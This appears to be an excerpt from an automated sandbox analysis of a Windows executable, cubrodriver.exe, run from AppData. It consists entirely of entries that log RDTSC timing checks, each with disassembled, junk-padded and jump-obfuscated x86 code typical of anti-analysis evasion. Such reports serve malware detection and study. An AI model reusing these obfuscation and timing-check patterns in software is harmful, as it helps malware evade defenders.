Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 493006F second address: 49300AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F01B4D45EDDh 0x0000000a sub eax, 5FD117C6h 0x00000010 jmp 00007F01B4D45EE1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp], ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F01B4D45EDDh 0x00000023 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49300AE second address: 49300B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49300B4 second address: 49300B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49300B8 second address: 49300BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49300BC second address: 4930163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F01B4D45EDFh 0x0000000f sub eax, eax 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F01B4D45EE5h 0x00000018 xor ax, 1136h 0x0000001d jmp 00007F01B4D45EE1h 0x00000022 popfd 0x00000023 movzx ecx, di 0x00000026 popad 0x00000027 mov edx, dword ptr [ebp+0Ch] 0x0000002a pushad 0x0000002b mov bh, B1h 0x0000002d pushfd 0x0000002e jmp 00007F01B4D45EE2h 0x00000033 sbb si, A788h 0x00000038 jmp 00007F01B4D45EDBh 0x0000003d popfd 0x0000003e popad 0x0000003f nop 0x00000040 pushad 0x00000041 mov edi, esi 0x00000043 pushfd 0x00000044 jmp 00007F01B4D45EE0h 0x00000049 add ecx, 428389E8h 0x0000004f jmp 00007F01B4D45EDBh 0x00000054 popfd 0x00000055 popad 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4930163 second address: 4930167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4930167 second address: 493016D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 493016D second address: 4930173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4930173 second address: 49301B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F01B4D45EE6h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F01B4D45EE7h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49301B9 second address: 49301D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B44E8CA4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49301D1 second address: 4930257 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e call 00007F01B4D45EE2h 0x00000013 pop ecx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 call 00007F01B4D45EE7h 0x0000001b pop ecx 0x0000001c pop edx 0x0000001d popad 0x0000001e nop 0x0000001f pushad 0x00000020 mov cx, 19D1h 0x00000024 popad 0x00000025 call 00007F01B4D45ED9h 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d pushfd 0x0000002e jmp 00007F01B4D45EDFh 0x00000033 xor esi, 05A4C4BEh 0x00000039 jmp 00007F01B4D45EE9h 0x0000003e popfd 0x0000003f rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4930257 second address: 49302BE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F01B44E8CA0h 0x00000008 sbb eax, 71EB15B8h 0x0000000e jmp 00007F01B44E8C9Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov esi, 3007F9EFh 0x0000001b popad 0x0000001c push eax 0x0000001d jmp 00007F01B44E8CA5h 0x00000022 mov eax, dword ptr [esp+04h] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F01B44E8C9Ah 0x0000002f or ax, 6F48h 0x00000034 jmp 00007F01B44E8C9Bh 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49302BE second address: 493030B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F01B4D45EE2h 0x00000008 pushfd 0x00000009 jmp 00007F01B4D45EE2h 0x0000000e or cx, 54D8h 0x00000013 jmp 00007F01B4D45EDBh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F01B4D45EDBh 0x00000027 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 493030B second address: 493030F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 493030F second address: 4930315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4930315 second address: 4930336 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4930336 second address: 493033D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 493033D second address: 4930357 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 mov dh, B7h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c mov cx, 2D61h 0x00000010 popad 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov bh, 83h 0x00000017 mov edx, eax 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4930357 second address: 493035D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 493035D second address: 4930361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4930361 second address: 4930365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4930365 second address: 493037B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F01B44E8C9Bh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 493037B second address: 49303B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F01B4D45EDEh 0x0000000f push dword ptr [ebp+34h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov eax, edi 0x00000017 mov bx, 0FFCh 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49303B4 second address: 49303C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B44E8CA1h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49303C9 second address: 49303CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49303CD second address: 493047A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c mov edi, 6DF44F2Eh 0x00000011 pushfd 0x00000012 jmp 00007F01B44E8C9Fh 0x00000017 sub ch, FFFFFFDEh 0x0000001a jmp 00007F01B44E8CA9h 0x0000001f popfd 0x00000020 popad 0x00000021 push dword ptr [ebp+30h] 0x00000024 jmp 00007F01B44E8C9Eh 0x00000029 push dword ptr [ebp+2Ch] 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F01B44E8C9Eh 0x00000033 xor ecx, 7A15F708h 0x00000039 jmp 00007F01B44E8C9Bh 0x0000003e popfd 0x0000003f popad 0x00000040 push dword ptr [ebp+28h] 0x00000043 pushad 0x00000044 pushad 0x00000045 mov edx, 22EB39E4h 0x0000004a call 00007F01B44E8C9Dh 0x0000004f pop eax 0x00000050 popad 0x00000051 mov esi, edi 0x00000053 popad 0x00000054 push dword ptr [ebp+24h] 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F01B44E8CA6h 0x0000005e rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 493047A second address: 4930505 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F01B4D45EE1h 0x00000009 sbb esi, 5DD47236h 0x0000000f jmp 00007F01B4D45EE1h 0x00000014 popfd 0x00000015 mov cx, EA27h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push dword ptr [ebp+20h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F01B4D45EDFh 0x00000028 or ah, 0000006Eh 0x0000002b jmp 00007F01B4D45EE9h 0x00000030 popfd 0x00000031 pushfd 0x00000032 jmp 00007F01B4D45EE0h 0x00000037 xor esi, 59FF02E8h 0x0000003d jmp 00007F01B4D45EDBh 0x00000042 popfd 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4930505 second address: 493051D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B44E8CA4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 493051D second address: 4930571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+1Ch] 0x0000000e pushad 0x0000000f call 00007F01B4D45EE4h 0x00000014 mov si, 32C1h 0x00000018 pop eax 0x00000019 mov edx, 30D7F6F2h 0x0000001e popad 0x0000001f push dword ptr [ebp+18h] 0x00000022 pushad 0x00000023 jmp 00007F01B4D45EDFh 0x00000028 mov dx, cx 0x0000002b popad 0x0000002c push dword ptr [ebp+14h] 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4930571 second address: 4930575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4930575 second address: 493058C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 493058C second address: 49305B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+10h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov edx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49305C7 second address: 49305CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49305CB second address: 49305D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49305D1 second address: 49305E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B4D45EDCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49305E1 second address: 49305E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49305E5 second address: 49305FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F01B4D45EDAh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49305FA second address: 4930600 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4930600 second address: 4930604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49002A6 second address: 49002BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49002BC second address: 49002C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49002C0 second address: 49002DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49002DB second address: 49002F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B4D45EE4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49002F3 second address: 4900317 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov di, ax 0x0000000d mov dh, ah 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 jmp 00007F01B44E8C9Bh 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b mov dx, si 0x0000001e rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4900317 second address: 490031B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 490031B second address: 490034F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ecx, dword ptr [ebp+08h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F01B44E8CA2h 0x00000013 sbb ax, 56E8h 0x00000018 jmp 00007F01B44E8C9Bh 0x0000001d popfd 0x0000001e mov edi, eax 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 490034F second address: 4900372 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edx, ax 0x00000010 mov edx, esi 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4900372 second address: 4900378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4900378 second address: 490037C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 490037C second address: 4900380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4900380 second address: 490038F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 490038F second address: 4900393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4900393 second address: 4900399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4900399 second address: 49003B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B44E8CA9h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49003EF second address: 49003FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49003FE second address: 492030E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b jmp 00007F01B44E8C9Eh 0x00000010 mov ecx, esi 0x00000012 jmp 00007F01B44E8CA0h 0x00000017 or ecx, edx 0x00000019 jmp 00007F01B44E8CA0h 0x0000001e je 00007F0226B6CD66h 0x00000024 pushad 0x00000025 movzx eax, bx 0x00000028 mov bh, AFh 0x0000002a popad 0x0000002b mov eax, dword ptr [esi+00000088h] 0x00000031 pushad 0x00000032 call 00007F01B44E8CA0h 0x00000037 mov ch, B8h 0x00000039 pop ebx 0x0000003a mov dx, si 0x0000003d popad 0x0000003e or eax, dword ptr [esi+0000008Ch] 0x00000044 jmp 00007F01B44E8CA6h 0x00000049 jmp 00007F0226B6CCFCh 0x0000004e jne 00007F01B44E8CA3h 0x00000050 test byte ptr [esi+11h], 00000010h 0x00000054 jne 00007F01B44E8C9Dh 0x00000056 mov eax, dword ptr [esi+38h] 0x00000059 or eax, dword ptr [esi+3Ch] 0x0000005c jne 00007F01B44E8C95h 0x0000005e inc eax 0x0000005f jmp 00007F01B44E8C9Dh 0x00000061 pop esi 0x00000062 pop ebp 0x00000063 retn 0004h 0x00000066 push 00000000h 0x00000068 push 00000000h 0x0000006a push 00000000h 0x0000006c lea eax, dword ptr [ebp-20h] 0x0000006f push eax 0x00000070 call 00007F01B44EA7C5h 0x00000075 jmp 00007F01B8A05E73h 0x0000007a mov edi, edi 0x0000007c push eax 0x0000007d push edx 0x0000007e jmp 00007F01B44E8C9Fh 0x00000083 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 492030E second address: 4920316 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4920316 second address: 4920398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 mov bx, ax 0x0000000c call 00007F01B44E8CA6h 0x00000011 mov cx, 6B91h 0x00000015 pop eax 0x00000016 popad 0x00000017 mov dword ptr [esp], ebp 0x0000001a jmp 00007F01B44E8C9Dh 0x0000001f mov ebp, esp 0x00000021 jmp 00007F01B44E8C9Eh 0x00000026 mov edx, dword ptr [ebp+10h] 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F01B44E8C9Eh 0x00000030 sub cx, 8B48h 0x00000035 jmp 00007F01B44E8C9Bh 0x0000003a popfd 0x0000003b mov dh, ah 0x0000003d popad 0x0000003e sub esp, 20h 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F01B44E8C9Eh 0x00000048 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4920398 second address: 492039E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 492039E second address: 4920425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+14h] 0x0000000b jmp 00007F01B44E8CA9h 0x00000010 mov eax, edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F01B44E8C9Ch 0x00000019 and eax, 7EAD3B38h 0x0000001f jmp 00007F01B44E8C9Bh 0x00000024 popfd 0x00000025 jmp 00007F01B44E8CA8h 0x0000002a popad 0x0000002b or eax, ecx 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 pushfd 0x00000031 jmp 00007F01B44E8C9Ch 0x00000036 jmp 00007F01B44E8CA5h 0x0000003b popfd 0x0000003c rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4920425 second address: 4920462 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F01B4D45EE0h 0x00000008 and ch, 00000028h 0x0000000b jmp 00007F01B4D45EDBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 mov dl, C5h 0x00000016 pop eax 0x00000017 popad 0x00000018 push esp 0x00000019 jmp 00007F01B4D45EDCh 0x0000001e mov dword ptr [esp], esi 0x00000021 pushad 0x00000022 push esi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4920462 second address: 49204DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 mov bx, F12Ah 0x0000000a pop edi 0x0000000b popad 0x0000000c mov esi, FFFE0000h 0x00000011 pushad 0x00000012 movzx eax, bx 0x00000015 pushfd 0x00000016 jmp 00007F01B44E8CA9h 0x0000001b sub ecx, 4A27A756h 0x00000021 jmp 00007F01B44E8CA1h 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, edi 0x00000029 pushad 0x0000002a mov bh, ch 0x0000002c pushad 0x0000002d movsx edi, ax 0x00000030 mov ch, D9h 0x00000032 popad 0x00000033 popad 0x00000034 push eax 0x00000035 jmp 00007F01B44E8C9Ah 0x0000003a xchg eax, edi 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F01B44E8CA7h 0x00000042 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49204DB second address: 49204E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49204E1 second address: 49204E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49204E5 second address: 4920521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F01B4D45EE8h 0x00000013 sub esi, 405BB568h 0x00000019 jmp 00007F01B4D45EDBh 0x0000001e popfd 0x0000001f movzx eax, di 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4920521 second address: 4920527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4920527 second address: 492052B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
